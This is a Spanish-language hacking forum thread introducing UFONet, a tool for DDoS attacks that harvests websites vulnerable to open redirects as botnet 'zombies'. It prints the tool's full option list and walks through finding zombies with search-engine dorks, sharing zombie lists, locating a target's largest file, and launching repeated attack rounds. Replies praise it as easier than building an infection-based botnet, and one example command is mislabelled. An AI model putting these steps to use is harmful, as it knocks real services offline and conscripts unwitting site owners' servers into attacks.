UFONet - DDoS Botnet vía Web Abuse.

Iniciado por HATI, Abril 12, 2016, 10:03:10 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Abril 12, 2016, 10:03:10 AM Ultima modificación: Mayo 07, 2016, 02:26:12 AM por Cl0udswX
UFONet


Puedes leer este post en inglés: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Seguro que muchos de vosotros ya lo conoceis debido a que se trata de una herramienta con cierto tiempo, pero no encontre nada sobre ella en el foro y por este motivo he decidido escribir el post.

Resumiendo, UFONet es una herramienta para realizar ataques DDoS, que aprovecha la vulnerabilidad Open Redirect en aplicaciones web de terceros y actúa de forma similar a una botnet.
La vulnerabilidad Open Redirect permite al atacante realizar una redirección al lugar que él escoga, debido a que dicha redirección se encuentra en una variable que el usuario puede controlar.

Creo que se trata de una herramienta curiosa y facil de usar, que ha buscado una forma útil y poco vista de explotar esta vulnerabilidad.

--Help:

Options:
  --version                                               show program's version number and exit
  -h, --help                                              show this help message and exit
  -v, --verbose                                         active verbose on requests
  --update                                               check for latest stable version
  --check-tor                                           check to see if Tor is used properly
  --force-yes                                           set 'YES' to all questions
  --disableisup                                          disable external check of target's status
  --gui                                                    run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY                                    Use proxy server (tor: 'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')
    --user-agent=AGENT                             Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER                                Use another HTTP Referer header (default SPOOFED)
    --host=HOST                                       Use another HTTP Host header (default NONE)
    --xforw                                               Set your HTTP X-Forwarded-For with random IP values
    --xclient                                             Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT                              Select your timeout (default 10)
    --retries=RETRIES                                 Retries when the connection timeouts (default 1)
    --threads=THREADS                              Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY                                     Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH                                           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS                                         Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS                              Set max number of results for engine (default 10)
    --se=ENGINE                                        Search engine to use for 'dorking' (default: duck)
    --sa                                                   Search massively using all search engines

  *Test Botnet*:

    -t TEST                                              Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me                                        Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies                              Download 'zombies' from Community server: Turina
    --upload-zombies                                  Upload your 'zombies' to Community server: Turina
    --blackhole                                          Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP                                       Upload your 'zombies' to a 'blackhole'
    --down-from=DIP                                  Download your 'zombies' from a 'blackhole'

  *Research Target*:

    -i INSPECT                                           Search for biggest file (ex: -i 'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')

  *Configure Attack(s)*:
    --disable-aliens                                     Disable 'aliens' web abuse of test services
    --disable-isup                                       Disable check status 'is target up?'
    -r ROUNDS                                           Set number of rounds (default: 1)
    -b PLACE                                             Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET                                           Start Web DDoS attack (ex: -a 'http(s):No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')


Método de ataque:

#Busqueda de zombies:

Para realizar un ataque DDoS mediante UFONet, primero debemos recolectar sitios web que sean vulnerables a Open Redirect (zombies). Para ello hay que usar determinados Dorks. La herramienta incluye un wordlist llamado dorks.txt donde podemos encontrar algunos parámetros útiles como "proxy.php?url=" o "validator?uri=".

-Buscar con un parámetro:
Código: php
./ufonet -s 'proxy.php?url='


-Buscar con una lista de dorks:
Código: php
./ufonet -s 'proxy.php?url='


-UFONet permite seleccionar el motor de búsqueda entre google, duck, yahoo, yandex y bing:
Código: php
./ufonet -s 'proxy.php?url=' --se 'bing'


-Buscar en todos los motores de búsqueda:
Código: php
./ufonet -s 'proxy.php?url=' --sa 


-Controlar el número máximo de "zombies" como resultado:
Código: php
  ./ufonet --sd 'dorks.txt' --sa --sn 20


-Tras la búsqueda se nos pregunta si queremos comprobar si las urls "zombie" encontradas son realmente vulnerables:
Código: php
 Wanna check if they are valid zombies? (Y/n)


-Tras el chequeo, se nos pregunta si queremos actualizar la lista de "zombies" añadiendo los nuevos sitios vulnerables a Open Redirect:
Código: php
Wanna update your list (Y/n)



#Probando la botnet:

-Lanzar test:
Código: php
 ./ufonet -t zombies.txt


-Lanzar ataque a ti mismo:
Código: php
 ./ufonet --attack-me 



#Inspeccionando un objetivo:

-Con esta opción encontrarás el fichero de mayor tamaño en el objetivo:
Código: php
./ufonet -i http://target.com


-Usar el resultado con el fin de realizar ataques más efectivos:
Código: php
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"



#Atacando un objetivo:

-Introduce objetivo para atacar un número determinado de rondas (por defecto 1 ronda)
Código: php
./ufonet -a http://target.com -r 10





Estas son las opciones básicas de UFONet, aparte trae otras funciones más avanzadas como el uso de proxy. También es posible usar la herramienta mediante una interfáz gráfica con el comando: 
Código: php
./ufonet --gui


Post en inglés: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Página oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo, hati  ;D


Jugar o perder

Personalmente no conocía esta herramienta!
está interesante  ;D ;D
Muchas gracias!!

Saludos!
Nivel 77 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¡Muchísimas Gracias!

Ya que quienes saben los tedioso de armar una Botnet mediante .SRC, entre la compilación, dejarla indetectable e infectar.

Gran aporte.

Nuevamente muchas gracias por el aporte HATI.

¡Feliz Año 2017!  :)
"La mejor forma de obtener información correcta de los foros, es enviar algo incorrecto y esperar las correcciones"
-- Matthew Austern --

Enero 02, 2017, 08:01:01 PM #3 Ultima modificación: Enero 02, 2017, 09:04:53 PM por Stiuvert
No recuerdo muy bien,pero creo que UfoNet tiene bug la opción de buscar zombies o no se,se que algo de los zombies era...corríjanme si me equivoco.